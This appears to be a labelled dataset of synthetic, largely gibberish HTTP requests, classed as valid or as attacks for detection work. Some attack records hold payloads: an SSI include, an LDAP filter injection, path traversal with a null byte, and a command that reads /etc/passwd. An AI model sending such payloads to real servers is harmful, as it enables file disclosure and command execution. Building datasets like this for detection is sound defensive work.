From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Tue, 24 Mar 09 12:38:47 GMT
If-Unmodified-Since: Tue, 06 Apr 04 12:24:06 CET
If-Match: "UQLEztqaF1azD8s"
If-None-Match: *
If-Range: Tue, 21 Jun 05 19:32:03 CET
Max-Forwards: 0
MIME-Version: 3.9
Pragma: 84='pu'
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: Digest qop=auth-int
Range: -652120,9-,091-
Referer: /dmhsajum/hrnmto/mita/4ryf.sh
TE: deflate;q=0.5
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 0.0; vn-sa; rv:7.9.5) Gecko/53280902
UA-CPU: Sparc
UA-Disp: 101,468,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 514x2901
Via: sfSuxm/7.1 www.nesnc.tiff, rsnwR5/1.0 216.60.213.85, 6.2 www.edIqln.shtml
Transfer-Encoding: deflate
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 323 77.72.228.98 "YYeeulm" "Sat, 03 Sep 05 06:25:56 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 6166781
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16336
Start - Id: 40542
class: SSI
GET /sEW_WCP0w/h9a--xQd-c@Bmg4t/8WS@hIVeZvJU/hln7i4chiefs4xma/8roohoroo/i3QhkE2s/osaawopceii.png?7zinieohesc=58121&nn8Wtta=keval+1a%245&k8yGWrmhomeTr2yO=Omrtn&OIST.nU=%3C%21--+%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E HTTP/1.0
Host: 31.110.238.195:6
Connection: uhx7
Accept: */*
Accept-Charset: cp-950;q=0.7, isiri-3342;q=0.4, x-mac-turkish;q=0.7, x-mac-icelandic;q=0.8, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: Le6n2='umtsakk'
Client-ip: 200.43.139.211
Cookie: 8emmaexmnvT9d=a8to0nodeedvarewh<b/is
Cookie2: $Version="086"
Date: Mon, 27 Dec 04 11:49:48 CET
ETag: W/"XZevC_bwA58lBhPSH"
Expect: ea6E=drNt
From: ta3nehq@tidsguy.fr
If-Modified-Since: Sun, 23 Mar 08 08:07:58 CET
If-Unmodified-Since: Thu, 16 Aug 07 17:38:39 UTC
If-Match: "9dDTOcaM0mXhVirsfI0e"
If-None-Match: "QvUMCdapAOG@6ZgY.MVj"
If-Range: *
Max-Forwards: 39
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="etpe"
Authorization: 6aniqu uooanu1o=mted
Range: -130317
Referer: http://www.hczl65t.gov/EaOaa/lzucdr/xTntha.rar
TE: trailers,gzip;q=0.9,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: hPNhf/6.1.1.9.7
UA-CPU: Sparc
UA-Disp: 373,5192,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3418x3633
Via: 2.0 www.hotltu.jpeg, yOidfw/7.6 61.102.96.207, FTP/7.7 183.8.233.66
Transfer-Encoding: gzip
Upgrade: 6rlio/4.7, fdSRh/0.3
Warning: 261 www.Bfrbi.gif "t7dooeohn" "Fri, 22 Jul 05 19:29:03 UTC"
X-Forwarded-For: 254.199.2.194
X-Serial-Number: 517978211015
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40542
Start - Id: 31141
class: Valid
GET /idCrz2ijWVnW3k/eTKcozMqpWU7A/tYEFOtTDM@4z/fsI./ek/au/eYW1EWWnXR/hJe-GjQSCsaqG/nn/avJuj.I0zUIQ/ibEPZffOcCkmeYSVT/giinrz8si7.asp?At=83877&NGU_H=2061374050&fryoeaibgeePr=o%2F7j&P7htpass1twPJD=hssel&orntErxng=tirai&tedE5atyTmut=ge%7EdinsertLuxb3orgiBld&ino=kln5ir&atvlgtt13d=HRmu8kpia2Eokad&wp.DaXU=h2.PTcg&6a3nozMhenIsl2=8732&budtui=xgroup+bylss&orUJF=rEaa&itsa=eePgMG&9q@vc=siwhereohuniona HTTP/1.1
Host: 117.36.82.226:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: NN3slsao-fbl;q=0.2, zrn-ccua, neRme-ywouZz, oeNnwt-hjoeifnr, tclN-o;q=0.8
Cache-Control: max-age=98
Client-ip: 239.241.26.103
Cookie: r2eewavnynz=2391
Cookie2: $Version="96"
Date: Sat, 24 Jan 09 15:58:46 CET
ETag: W/"SElZ2btlWPrC_9kq"
Expect: iM7Nmr
From: dgsh@nuauoeihu3.be
If-Modified-Since: Thu, 02 Mar 06 17:12:31 UTC
If-Unmodified-Since: Tue, 05 Feb 08 20:45:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 03:24:07 CET
Max-Forwards: 25
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic T2l1ZWhsOkVtTHYwdGV5
Authorization: Basic cGVFejVpcmw6ZW9veTA=
Range: 489-
Referer: /JeeFQi/t8shizs/rrc1xccs.sh
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/6.6 (X11; U; Linux i586 4.3; Ne-hs; rv:6.5.4) Gecko/23613947
UA-CPU: 68000
UA-Disp: 4975,930,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 006x0158
Via: ceiae/6.9 www.zsrea.jpg, HTTP/0.3 49.157.22.1
Transfer-Encoding: deflate
Upgrade: 2ro3rd/5.8
Warning: 406 www.aeUwu.shtml "s2n0a3tdlcheeb4euana" 
X-Forwarded-For: 129.20.120.4
X-Serial-Number: 16589272146
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31141
Start - Id: 27576
class: Valid
GET /rUoyaut/b6iimc6Eosu/ohclyhor/3sI/nEoE/8si5aE/oYiPo9KCYy7_/h5rtokOdrnapqsrse4/rfetFtsiaeersa/ehzdpLDWw3Or/rm1edyuhL/uFvuULl.htm? HTTP/1.1
Host: www.os0ntbzc.gov:86
Connection: keep-alive
Accept: text/plain, image/*;q=0.6, audio/*;q=0.3
Accept-Charset: x-mac-roman;q=0.3
Accept-Encoding: compress, identity;q=0.7
Accept-Language: eyTnnmdy-n1efys9e, sdaUeh-qryr, nDSj9j-attofT7f;q=0.9, s4eiie-iw, nI6i-nEtre
Cache-Control: max-stale=7
Client-ip: 62.241.68.195
Cookie: inrahssaEtuoxl=eax2hqtWsaeu8tbSg;7lq=lv-v;strsth=7
Cookie2: $Version="6"
Date: Mon, 03 Mar 08 11:05:20 GMT
ETag: W/"RnsaK75biiOYgV9ooI"
Expect: hriihcn
From: teIlii@rtloe.uk
If-Modified-Since: Sat, 10 Mar 07 16:03:46 GMT
If-Unmodified-Since: Mon, 05 Jun 06 17:58:56 UTC
If-Match: "4YyAFHSh5G.3T9Msm"
If-None-Match: *
If-Range: Tue, 02 Jun 09 04:16:13 GMT
Max-Forwards: 0
MIME-Version: 4.9
Pragma: apys6cu='tu'
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: AH8iA7 estag=1tieeidh
Range: 64-,748105-9,686441-
Referer: /upbft.png
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.6 (compatible; MSIE 1.9; Mac OS X; AaNxNEl)
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5828x9422
Via: HTTP/1.9 59.87.54.115:79140, 9.7 www.70Wc.gif
Transfer-Encoding: gnree; algd48i=i8otcee
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 566 232.157.228.150 "dnPuf1sRqcAfw" 
X-Forwarded-For: 164.135.194.215
X-Serial-Number: 76901665181608584434
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27576
Start - Id: 17265
class: Valid
GET /a-5hs_5eMW3S4X6m/eYkSDVmue53wGb/ga0wE/e0dol.mspx? HTTP/1.1
Host: www.qaed9ig.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r-ier
Cache-Control: max-age=821
Client-ip: 107.223.88.236
Cookie: fah=anlgjnhasihn;ooocraoufekrehn=yV69yxLSoHu
Cookie2: $Version="4"
Date: Wed, 03 May 06 16:28:51 CET
ETag: "wg.hSonULX4HNFD@ox"
Expect: 8r0cEafD
From: cvrnce@Setoelnto.ch
If-Modified-Since: Tue, 25 Sep 07 08:22:22 CET
If-Unmodified-Since: Sun, 16 Apr 06 02:56:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM ZW9IaFRqYWFmaGFkbGRsZnV5bnJvQWZtZ25sc3loeHdyRXVweg==
Range: -986,9134-
Referer: http://www.bpwa6xe.it/tida9l/uto3r/a8agn/oosHinn/ihptvf.asmx
TE: trailers,gzip;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: tiguhdrcod (fS03fSpx0s; tMg3bv_D0)
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8061x129
Via: 6.8 www.grtd.gif, FTP/1.8 www.wnenCad.gif, FTP/7.2 www.1nnf3r.gif
Transfer-Encoding: enone
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 86.115.190.255
X-Serial-Number: 835471798337
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17265
Start - Id: 3301
class: Valid
GET /dsdwacgtbzAmco7n/slwNwna3Ee/ujooiemalissin/vbWbOFBpasswdSS/eenliae/hEd9ttaTidieirskh/nz8wu.Q0/amrk/abt979iajwtpirtaxo/dSfcivereIhdM.css?sieby1=4258076&gu035=ueeekw%3EOde%7Eeeie+&q8AvkeZXeL=v%2Bgmvsbinr%5CimgoR8&ld6ub5ttd=zobz%3Cnhrahsut+&nrhmedSngsde=s%40qSO&Ittrlrcerykottq=Usl9tm5n1akatrel3c&awshaodn=racogwwinnt%7CnrhavingR7fSs%7E&rHNI=40717&eituaehpsmsGlip=nguoe&ehssWmqs9n=77417&e4haTa=77298593&ndd=lroermheaoEmeU&dea=Rhvw HTTP/1.1
Host: 79.70.216.192
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=94
Client-ip: 25.206.2.134
Cookie: 9asstAc=rD_xJru;loaAlkin=qiatla%;ie3roD5n=hBksiaImemakzenrnn;cetoy0i4io=emapasswdti wpiee;7fHettt=passwd;ewkirsi5etrI=4544863718
Cookie2: $Version="250"
Date: Mon, 14 Nov 05 21:43:36 UTC
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: obew1
From: gooi@er7rmrhs.st
If-Modified-Since: Sat, 29 Aug 09 09:58:18 CET
If-Unmodified-Since: Sat, 09 Oct 04 23:51:19 CET
If-Match: "BdFMO597hpFUiopd"
If-None-Match: *
If-Range: Sun, 18 Dec 05 12:19:30 CET
Max-Forwards: 070
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: sitto qLaasrkg=sfn0ms
Range: 715429-,64862-,731-870612
Referer: http://www.zbepna.uk/ebfbhecw/ahruel/SajshsD/6fkgc.dll
TE: trailers,gzip;q=0.8,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.2 (X11; U; Linux i586 1.7; or-wl; rv:1.0.5) Gecko/19298255
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 179x3842
Via: FTP/4.3 www.8ec7b.css, 6.3 www.eifke.js
Transfer-Encoding: gzip
Upgrade: hsoEu/9.9
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3301
Start - Id: 1510
class: Valid
GET /kodfn7satAyrew6brue/x2q2A6cmdfAhFR/gvysao.css?una8hxtigqoulah=selo&Ectlcj=3857617&uoemaetsredgoh6=sunionaexec2&suh4m9amt=271258772&rtacn2etr=1&Cn=470681379&ty=ca%5C&Arnuer0zrcfief=execdn&A13GimgiPC2Tw=1816410&6v=lfi%25bgsound&xyeo9=rvieyihgi&ptI=h0Wf&mo6lkactteean=54894187 HTTP/1.1
Host: www.wdticihr.st:20487
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.8, identity;q=0.6, identity;q=0.0, compress;q=0.0, deflate;q=0.6
Accept-Language: gtlmeu-dlcnien
Cache-Control: max-stale
Client-ip: 188.65.133.118
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="3"
Date: Fri, 12 Jan 07 21:00:25 GMT
ETag: "Vl4vlakcNIFSotq"
Expect: 100-continue
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Tue, 20 Apr 04 12:16:08 GMT
If-Unmodified-Since: Sun, 14 Mar 10 08:27:41 UTC
If-Match: *
If-None-Match: "cVLJD_2S2TB.Lkf"
If-Range: Tue, 25 Sep 07 20:24:33 CET
Max-Forwards: 39
MIME-Version: 7.1
Pragma: C='e'
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: NTLM bGU3bjdhaXBMVGZlbmFkamRPaW5nblkzalkxaGQ4dmFkaXRFTmlsaQ==
Range: 460-9787,-3
Referer: http://www.tAuAtiel.it/e6waSn/hElgu/6eiotzHx.mspx
TE: deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/6.1 (X11; U; Linux i386 0.7; cs-fr; rv:5.1.8) Gecko/67583405
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 8.7 www.l3ea.png
Transfer-Encoding: compress
Upgrade: ma3Ld/8.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 55.173.238.176
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1510
Start - Id: 37605
class: LdapInjection
POST /nrnenb8liine/OeLZo/hiIisg8gvoo/n0R-pxLsj.jpg? HTTP/1.0
Content-Length: 293
Content-Language: begnu,rw2te
Content-Encoding: gzip
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: cFNsbDZob2V0bmx1a3RvRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 19:20:07 GMT
Last-Modified: Tue, 15 Jun 04 02:29:36 CET
Host: 19.15.41.192
Connection: anpw
Accept: image/*, text/html;q=0.8
Accept-Charset: x-mac-turkish, x-mac-greek;q=0.9, cp-950
Accept-Encoding: identity, deflate;q=0.5, identity;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 84.232.100.185
Cookie: fusbve=riT Hda te;w84dm=627926;he=jFZoBC9;eiier4=aT13ku;atleut=cemt
Cookie2: $Version="2"
Date: Wed, 28 Jan 09 19:35:32 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: atOn8lmw=quhao
From: shqwscZ@htnl9xec.gov
If-Modified-Since: Fri, 18 Jun 04 22:56:49 CET
If-Unmodified-Since: Mon, 25 Sep 06 16:51:15 CET
If-Match: "ESN@9jgCV2kxO9VF"
If-None-Match: *
If-Range: "bKzjmmSku3m81rjF"
Max-Forwards: 978
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 5-,297-087
Referer: /jefbcf/ardc/kczimh.gz
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 4.2; tf-e8; rv:5.9.6) Gecko/96466848
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: nn1ome
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

bunaonmad8=iframeiu9tat&htteefromR[cv9&KEmy.areplacench3g8=<reerr&SrPnph-V=Ghsenatee&fr5nlgpldktzidm=egrc tradg&yfzmRxes2mobn=piaunw1q1h798&XlNs0Ot4=t1ndne&must4FTroqutaa=ie&kt574DDstese=9&eoiommNk=tqO30&srove8weteyeyc=ngxui/&HYallE7oI=")(targetfilter=(o=NetscapeRoot))

End - Id: 37605
Start - Id: 30292
class: Valid
GET /prWewarlbssr/1DNb5/6y3UWhYfb/bJLqb/wtoterhthnEicoLiT/5o6ebno/mGn52H@xKpVO7x@ZdqG/ringERt_Y0t0dd9passthrul.php4?dyEhtolno=thphp+&ieyce5w1no=084987&reerlfzwneKdep=habar&aee=279771&Dw=+logam&6tvsfjhh=840131&Ftp=dei9&etabbsfnncjgh=94208 HTTP/1.1
Host: 239.190.55.255
Connection: keep-alive
Accept: application/postscript;q=0.8, audio/*;q=0.4
Accept-Charset: x-mac-chinesetrad, windows-1258;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=1454
Client-ip: 195.48.49.162
Cookie: ittoar=6845027439;tthwosa=w1ihttpsg3pipEqO'naef;NytaSheua2e3eg5=9082088;obace2=t6MbiPHJsogv;Bt=dCge3Gp5
Cookie2: $Version="18"
Date: Fri, 31 Aug 07 21:45:37 CET
ETag: "kPrrE259PGi65-tL"
Expect: 100-continue
From: hgNhns@5tun.biz
If-Modified-Since: Tue, 10 Feb 04 18:43:09 GMT
If-Unmodified-Since: Sun, 16 Dec 07 10:13:20 GMT
If-Match: "xnxGeJz.cuFrDtJf5"
If-None-Match: *
If-Range: Mon, 27 Nov 06 12:32:57 GMT
Max-Forwards: 1669
MIME-Version: 1.8
Pragma: jdv=kfEea
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic YXRhZXR0OmlwYXlh
Range: -915389
Referer: /fwdai.ace
TE: trailers
Trailer: Range
User-Agent: Mozilla/8.3 (Windows; U; WinNT 0.9; N9-fe; rv:8.2.5) Gecko/90900959
UA-CPU: MIPS
UA-Disp: 132,042,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 691x450
Via: Usalti/0.8 www.mei5.png
Transfer-Encoding: gzip
Upgrade: 1nt/1.0, ro5lno/8.9, ef7eT/2.2, flzros/0.3, raaae/2.1
Warning: 610 www.asyfa7.png:791 "eaiobtefu" "Tue, 13 Apr 10 21:48:36 UTC"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30292
Start - Id: 44668
class: PathTransversal
GET /ED6uejesTkjltue/jJhX/nauteom/2ohg/a5mfvTNCeNKo/a0afjsBoolai/oGLZ/zRRqUxgwMOWx4yZIGW/orttl/mKY8H_1MZh/y0rdooqdigkyL/4eiI.pl?ardetd1bt=l2mHoxlm0%3C&eMei=ne%2F%3C&trudd=15699&treh2iradbLcnNi=cimsan%3Fo&k1vednr9=n+e+qp7krfC&nn=zsincludeu&e5wAne3ehctE=idhlfvx6%40&9mmed2cnihe8e=5935&ecs6o=sn&g9hyMRIMY=t%26Pjbe&si6lehie=jr&2eoeHrtrcagddNr=5198 HTTP/1.1
Host: 243.163.205.55:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, compress, deflate
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 47.118.94.95
Cookie: LtCarBv5=../../UBData/Members/members.grp%00;ixuhnSH1ire=505
Date: Sun, 04 Oct 09 12:24:21 GMT
ETag: "Wb4rFHP0X1Jc6ektHn"
From: Jatw@uras.it
If-Modified-Since: Tue, 11 Nov 08 11:35:05 GMT
If-Unmodified-Since: Tue, 29 Nov 05 21:33:51 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Jan 07 21:29:09 GMT
Max-Forwards: 5735
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: etOx mtcLY=aeczc
Authorization: ietwhn uraniar=eoeggtt
Range: 267-5496
Referer: /enss/ltetn/mslewt/9drKe/szuoh8p.gz
TE: deflate;q=0.9,deflate;q=0.8
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 9.4; do-be; rv:1.6.9) Gecko/47258967
UA-Disp: 2213,7553,16
UA-OS: WinNT
UA-Pixels: 0638x7767
Via: 2.6 49.171.93.147, tDt/7.6 www.nenet5.shtml:36586
Transfer-Encoding: deflate
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 72425044847598734540

null

End - Id: 44668
Start - Id: 12236
class: Valid
GET /63SweD/Ieoed/rR/rx4l/sG@FxZw/oQNp@JO1sUq/rRIesmets/iy7oZg/o8a.jpeg? HTTP/1.0
Host: 203.22.103.209:73
Connection: keep-alive
Accept: text/*, text/plain;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: Ehf='e'
Client-ip: 218.85.114.86
Cookie: 99IH=ntrtttn27nmdmnlec
Cookie2: $Version="3"
Date: Sat, 11 Mar 06 05:57:56 CET
ETag: W/"b6Wv1SJd-ZDUHZE"
Expect: 100-continue
From: msaq@tanxaosh5.ch
If-Modified-Since: Tue, 29 Aug 06 17:05:51 CET
If-Unmodified-Since: Sun, 16 Sep 07 10:29:29 UTC
If-Match: "aPW0.pmxIkhC5k7@a"
If-None-Match: "vyZly1b-ECvQW4jhvZ"
If-Range: Fri, 06 Jul 07 06:18:04 CET
Max-Forwards: 1505
MIME-Version: 1.6
Pragma: oloi3='iv3lels'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest response="285a4E608D4F9000A3bca4bd9D37CE15"
Range: 7235-,-720750
Referer: http://www.twde1e.ch/ruHrsa2/4eoa0/zndi.mspx
TE: trailers,gzip;q=0.4
Trailer: Expect
User-Agent: otwCl (apXujCyhNJ; 2OwPjh-1Sr; aNpJyga; iYWiZa; 3uIL1JdjmP)
UA-CPU: MIPS
UA-Disp: 2190,4880,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5966x0080
Via: 8.4 www.m2lt2.jpg:25, 0.0 197.125.41.216
Transfer-Encoding: deflate
Upgrade: xnhun/4.7, foajfe/4.9, tiTnoe/9.3, sHsmu/7.7
Warning: 176 125.171.28.119 "rAswf" "Thu, 16 Oct 08 01:05:52 GMT"
X-Forwarded-For: 60.209.14.143
X-Serial-Number: 8899123917889
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12236
Start - Id: 3606
class: Valid
GET /hNar1US7/oExa9alu/f-Y4kzfAM0KNMIKMRTFc/oRMFnEOHYOy/ei1r6aginhUh/sooieu/crzJArdivkEBmDyG3/zCCzE2C/nVdtrX0c5nBmrnq/6lhf.T4-.oSFrG6-rg/vEaahererzteshNrsqt.css?3Invs71hnuieccs=ites%40hhdeleteta&lQ4t.C=n0Tr7toieaieilpx&ULmZmailj0G3fe=G4eeoi&rntaq=%3Etwniirt&qnlOexEndqmtt1c=98940714&euelryt5ssahe5o=e1zWxLw5&tycis=iapsr&J3RPt=17&Bbnmtohl38c=sole2&oeMoE2maue=Rbnf&clr8ReI=sdweopt+wimescripto&eE0ai=tCtSnj HTTP/1.1
Host: 99.97.179.3
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.1, gzip;q=0.6, identity, compress, identity
Accept-Language: 5-sihyWsr, iuhe3e-duIns;q=0.1, pss-08urh74, 9hoio-don;q=0.4
Cache-Control: min-fresh=11
Client-ip: 128.157.32.52
Cookie: JlinkT1_Ur=|dduf
Cookie2: $Version="746"
Date: Tue, 24 Nov 09 01:00:09 UTC
ETag: W/"-nf2lvC2chfFdKVoeX"
Expect: 100-continue
From: hdnKu@e5ctnmptt8.cz
If-Modified-Since: Sat, 22 Mar 08 16:12:17 GMT
If-Unmodified-Since: Fri, 23 Feb 07 05:30:43 UTC
If-Match: *
If-None-Match: "Vw@yoGNVAOzeEe2NMqjV"
If-Range: Sat, 02 Feb 08 11:57:17 CET
Max-Forwards: 62
MIME-Version: 6.3
Pragma: r4sqdo2='ieR'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=oiitfiR
Range: -276748,6-3375
Referer: /egG3tvs/ipsi2.doc
TE: trailers,chunked;q=0.9,gzip
Trailer: Proxy-Authorization
User-Agent: tnaOeLl (ejKTWALN)
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 2052x366
Via: 1.1 www.h1Se.tiff, 6sera/8.7 113.254.170.231, 8.1 www.aeMr.gif
Transfer-Encoding: deflate
Upgrade: aHnnn/4.7, e0Tge/7.4
Warning: 794 www.dlUteCja.htm "intmTihasyncs7wBlnT" "Sun, 26 Feb 06 19:18:11 UTC"
X-Forwarded-For: 35.71.57.22
X-Serial-Number: 41732
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3606
Start - Id: 44536
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: www.olec.biz:1633
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-4, utf-7, x-mac-chinesesimp;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-store
Cookie: rtoytmmtipdcs7y=315747;gejswdUnq=nht5;T4eeRowdamMof=698;xmy0allj7=rDaNXi
Date: Sat, 13 May 06 01:49:59 CET
If-None-Match: "KAybswvL.7Fe-AqlS-C@"
Max-Forwards: 45
Pragma: ska='uiOo13Ni'
Authorization: NTLM YUVkMGVuMmVzOXJzM2FwdGNtNHU1RFRjZWhwc3QwdGVldDc=
Referer: http://ygwte.be/Ir7ur9Ev/eednz/oLkaho/aaMdpsu/UiIdvnS.jpeg
TE: deflate;q=0.2
Trailer: Accept-Language
User-Agent: l42DuHeU http://www.tVctoAl.gov
Via: FTP/6.7 248.191.227.202, euulu/3.2 www.daoi.shtml
Transfer-Encoding: gzip
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44536
Start - Id: 28867
class: Valid
GET /ta_S7OiYV-/tZnOHIGBKbPt/2ik/7teQ/3lrtsgen6Ctainfih/tb_UbL/iJ/rXUnZTK6a/ixx8A2VkPnj7jF2.gif?owthnmnmt3aEts2=tahJ%2Fseanjvbscript3e HTTP/1.1
Host: 150.75.187.111
Connection: eruo5
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 3k6sqeea-hhnw, anmle7ty-scsnld, c3-oyxtd, tzoeoj-IwhC;q=0.7
Cache-Control: no-transform
Client-ip: 224.120.29.17
Cookie: e2nYbrUyL=cEsthu uEkh;h2m=t04SJZBtx;Casud=scD4KcN;izflgo=srd;eq5Hlnav2fga=dvS2s
Cookie2: $Version="4"
Date: Tue, 03 May 05 10:57:15 UTC
ETag: "k7zP9L0figytV0K"
Expect: asechwaC
From: 4zbw@syof.net
If-Modified-Since: Tue, 12 Dec 06 09:35:35 GMT
If-Unmodified-Since: Wed, 17 Jun 09 09:03:37 UTC
If-Match: "a2Fh19MD2EFEKnG5N"
If-None-Match: *
If-Range: "_E3bc2OudRyZoRhUkYB"
Max-Forwards: 3091
MIME-Version: 3.3
Pragma: la7eyodl=bbe
Proxy-Authorization: Basic RXNkc0NlZTp0MG5pcg==
Authorization: NTLM YlRxbG53ZWlsaWdhcGdpRWFibXM4dHFnRWVkaWVqZTd0YzJpYWVJ
Range: 697655-19,84300-379533,64-3466
Referer: /tn9rnn/rneocn7d/uDgli5e/dqi4.jsp
TE: chunked;q=0.2
Trailer: If-Unmodified-Since
User-Agent: eepiionfar (a8zRKAc-4; hDJfyFNpeX; rFEZrJ)
UA-CPU: x86
UA-Disp: 246,885,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/7.2 www.Bnluaie.png:87689, 1.1 160.178.219.210, 3.9 100.104.143.113
Transfer-Encoding: aom9a; l23W=ohtt
Upgrade: Heaaio/3.3, roeeIt/7.8, gaane/0.2, iti/4.2, eof/1.2
Warning: 917 243.155.99.233 "tpznaXgaSaxt" "Tue, 21 Sep 04 19:53:38 GMT"
X-Forwarded-For: 149.164.161.105
